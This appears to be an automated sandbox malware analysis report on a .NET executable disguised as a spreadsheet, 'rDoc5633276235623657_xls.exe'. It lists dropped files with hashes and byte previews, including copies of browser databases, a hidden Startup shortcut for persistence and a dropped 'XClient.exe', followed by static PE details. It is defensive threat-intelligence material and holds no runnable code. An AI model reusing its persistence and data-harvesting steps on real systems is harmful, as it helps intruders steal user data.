                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.0.8.<./.P.i.

                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER8C61.tmp.xml

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4855
                                    Entropy (8bit):4.456507852625626
                                    Encrypted:false
                                    SSDEEP:48:cvIwWl8zstJg77aI9PUrWpW8VYj5Ym8M4JfuQ3FYo+q8vR9QKQgLuOLukrd:uIjfHI7NUa7VJJfu2K3lBukukrd
                                    MD5:AD0D01FE68056A0A2EFC1A18C44827E9
                                    SHA1:9A7D4A885CE8C28D67D824F44F5DCDF17BC52103
                                    SHA-256:78DA2ADFD2DEABE6D80507C9503EA592DBBBE4866F7F87672ECC183AACCE935C
                                    SHA-512:CB1CECFC9EE33CF26A2914997257633E0224F451149DDF3CFB0F8ACE6AF99C40CBCBF2B48DF319FB6B3DB9435698D6451FFAC7A4869E12A27C3E903A0EF6DB45
                                    Malicious:false
                                    Reputation:low
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="517110" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rDoc5633276235623657_xls.exe.log

                                    Download File
                                    Process:C:\Users\user\Desktop\rDoc5633276235623657_xls.exe
                                    File Type:CSV text
                                    Category:dropped
                                    Size (bytes):847
                                    Entropy (8bit):5.345615485833535
                                    Encrypted:false
                                    SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                    MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                    SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                    SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                    SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                    Malicious:true
                                    Reputation:moderate, very likely benign file
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

                                    C:\Users\user\AppData\Local\Temp\places.raw

                                    Download File
                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                    File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                    Category:dropped
                                    Size (bytes):5242880
                                    Entropy (8bit):0.037963276276857943
                                    Encrypted:false
                                    SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                    MD5:C0FDF21AE11A6D1FA1201D502614B622
                                    SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                    SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                    SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\tmp1CCF.tmp.dat

                                    Download File
                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                    Category:dropped
                                    Size (bytes):40960
                                    Entropy (8bit):0.8553638852307782
                                    Encrypted:false
                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                    Malicious:false
                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\tmp1CD0.tmp.dat

                                    Download File
                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                    Category:dropped
                                    Size (bytes):28672
                                    Entropy (8bit):2.5793180405395284
                                    Encrypted:false
                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                    Malicious:false
                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\tmp1CF0.tmp.dat

                                    Download File
                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                    Category:dropped
                                    Size (bytes):159744
                                    Entropy (8bit):0.7873599747470391
                                    Encrypted:false
                                    SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                    MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                    SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                    SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                    SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                    Malicious:false
                                    Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\tmp1D00.tmp.dat

                                    Download File
                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                    Category:dropped
                                    Size (bytes):106496
                                    Entropy (8bit):1.1358696453229276
                                    Encrypted:false
                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                    Malicious:false
                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\tmp733.tmp.dat

                                    Download File
                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                    Category:dropped
                                    Size (bytes):98304
                                    Entropy (8bit):0.08235737944063153
                                    Encrypted:false
                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                    Malicious:false
                                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\tmp743.tmp.dat

                                    Download File
                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                    File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                    Category:dropped
                                    Size (bytes):5242880
                                    Entropy (8bit):0.037963276276857943
                                    Encrypted:false
                                    SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                    MD5:C0FDF21AE11A6D1FA1201D502614B622
                                    SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                    SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                    SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                    Malicious:false
                                    Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\tmp7C93.tmp.dat

                                    Download File
                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                    Category:dropped
                                    Size (bytes):114688
                                    Entropy (8bit):0.9746603542602881
                                    Encrypted:false
                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                    Malicious:false
                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\tmp7CA4.tmp.dat

                                    Download File
                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                    Category:dropped
                                    Size (bytes):114688
                                    Entropy (8bit):0.9746603542602881
                                    Encrypted:false
                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                    Malicious:false
                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\tmp7CB5.tmp.dat

                                    Download File
                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                    Category:dropped
                                    Size (bytes):49152
                                    Entropy (8bit):0.8180424350137764
                                    Encrypted:false
                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                    MD5:349E6EB110E34A08924D92F6B334801D
                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                    Malicious:false
                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\tmp7CC5.tmp.dat

                                    Download File
                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                    Category:modified
                                    Size (bytes):126976
                                    Entropy (8bit):0.47147045728725767
                                    Encrypted:false
                                    SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                    MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                    SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                    SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                    SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                    Malicious:false
                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\tmpA7EC.tmp.dat

                                    Download File
                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                    Category:dropped
                                    Size (bytes):106496
                                    Entropy (8bit):1.1358696453229276
                                    Encrypted:false
                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                    Malicious:false
                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

                                    Download File
                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Sep 26 10:26:13 2024, mtime=Thu Sep 26 10:26:13 2024, atime=Thu Sep 26 10:26:13 2024, length=65440, window=hide
                                    Category:dropped
                                    Size (bytes):764
                                    Entropy (8bit):5.026075316030624
                                    Encrypted:false
                                    SSDEEP:12:8gc24qvBSWCwdY//b/QfJLHHVjAs1rHk7zvVoVoBmV:8gmqvBNj+TQtnhAs1YnvSGBm
                                    MD5:F5F4A0B8619BE64851C649E0ADE69882
                                    SHA1:403C5AB7043DAE11C27646C8A30984B4C524BEB8
                                    SHA-256:107A3CC92165C71DBA5F42B8CE96EEB8E32CE974DC3D5E63564348E7031380FB
                                    SHA-512:97D5344786F366D144266FCDEB80B2E9C83901FF9227E54BB1C874A9520578ACAB3E26A12E7537B7ABEB0EBB9ECD7220C5F3E6ECD92428E6A8DF4532D868F059
                                    Malicious:false
                                    Preview:L..................F.... ...[.6.....[.6.....[.6.............................v.:..DG..Yr?.D..U..k0.&...&......vk.v.....t.....i.=.........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^:YC[...........................%..A.p.p.D.a.t.a...B.V.1.....:YA[..Roaming.@......CW.^:YA[..............................R.o.a.m.i.n.g.....b.2.....:YG[ .XClient.exe.H......:YG[:YG[..............................X.C.l.i.e.n.t...e.x.e.......Y...............-.......X...........(.&*.....C:\Users\user\AppData\Roaming\XClient.exe........\.....\.....\.....\.....\.X.C.l.i.e.n.t...e.x.e.`.......X.......928100...........hT..CrF.f4... .g.T..b...,.......hT..CrF.f4... .g.T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                    C:\Users\user\AppData\Roaming\XClient.exe

                                    Download File
                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):65440
                                    Entropy (8bit):6.049806962480652
                                    Encrypted:false
                                    SSDEEP:768:X8XcJiMjm2ieHlPyCsSuJbn8dBhFwlSMF6Iq8KSYDKbQ22qWqO8w1R:rYMaNylPYSAb8dBnsHsPDKbQBqTY
                                    MD5:0D5DF43AF2916F47D00C1573797C1A13
                                    SHA1:230AB5559E806574D26B4C20847C368ED55483B0
                                    SHA-256:C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
                                    SHA-512:F96CF9E1890746B12DAF839A6D0F16F062B72C1B8A40439F96583F242980F10F867720232A6FA0F7D4D7AC0A7A6143981A5A130D6417EA98B181447134C7CFE2
                                    Malicious:false
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Joe Sandbox View:
                                    • Filename: lchs.exe, Detection: malicious, Browse
                                    • Filename: Shipping Documemt.vbs, Detection: malicious, Browse
                                    • Filename: AaK2FmzNcl.exe, Detection: malicious, Browse
                                    • Filename: SecuriteInfo.com.Trojan.Siggen29.33686.11630.12129.exe, Detection: malicious, Browse
                                    • Filename: SecuriteInfo.com.Trojan.Siggen29.33686.11630.12129.exe, Detection: malicious, Browse
                                    • Filename: pic4.jpg.exe, Detection: malicious, Browse
                                    • Filename: file.exe, Detection: malicious, Browse
                                    • Filename: lgnasdfnds.exe, Detection: malicious, Browse
                                    • Filename: file.exe, Detection: malicious, Browse
                                    • Filename: rhTHyegj6G.exe, Detection: malicious, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0.............^.... ........@.. ....................... .......F....`.....................................O.......8................A........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......

                                    C:\Windows\appcompat\Programs\Amcache.hve

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:MS Windows registry file, NT/2000 or above
                                    Category:dropped
                                    Size (bytes):1835008
                                    Entropy (8bit):4.466325816864925
                                    Encrypted:false
                                    SSDEEP:6144:oIXfpi67eLPU9skLmb0b4zWSPKaJG8nAgejZMMhA2gX4WABl0uNmdwBCswSb+:9XD94zWlLZMM6YFH8++
                                    MD5:A55A2F63E9052A80B2F5E027DB810BEF
                                    SHA1:2D18D4AE008E2D7F3EBC4645CCAA957D575CEF27
                                    SHA-256:7929FAF156512156518E9D366BE3A3CE9D529394165CB63203C34DF2DDE99F4E
                                    SHA-512:320ACE80A2A493F4FFD877D9DD11ADCF0750DD76DDBB1CA96B2A2B5BD46B9532E50B2452DA5FEF70784B499E44017A7D38A58C96CBB9160BA055EA9B68A38205
                                    Malicious:false
                                    Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm>....................................................................................................................................................................................................................................................................................................................................................v.!........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):6.039108263599789
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                    • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    File name:rDoc5633276235623657_xls.exe
                                    File size:86'528 bytes
                                    MD5:d5489da5aa14ed9d71d8338ec41a1bc1
                                    SHA1:fe04a678f7d95ed31bd364e0a8a4831964f2b84f
                                    SHA256:96dea95151b45309d8bda1112f842802e852a15ac2173b0023b1ba35deae5ec1
                                    SHA512:68ae7b3c2367f9a2124dba4549ee90dede2fd12552acb7823eae42ffa014e7f4b37cb95b836d01de1270cbc3a48d2903988dc69d1f4f7646d39a9d0b7c77a940
                                    SSDEEP:1536:WGOLl+jxSwe51ZMXEw1PfEeRH0bndlu630VDx:WGOBCtE1ZpwJbSndTEVDx
                                    TLSH:1783190A3AC5C705D4E4BAF981F7591207A2BDD22231C24A6DF83B694E737A3ECC165D
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....R................................... ........@.. ....................................`................................

                                    File Icon

                                    Icon Hash:8f82989919951d01

                                    Static PE Info

                                    General

                                    Entrypoint:0x40e48e
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x9DC1522E [Fri Nov 14 00:19:58 2053 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                    Entrypoint Preview

                                    Instruction
                                    jmp dword ptr [00402000h]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
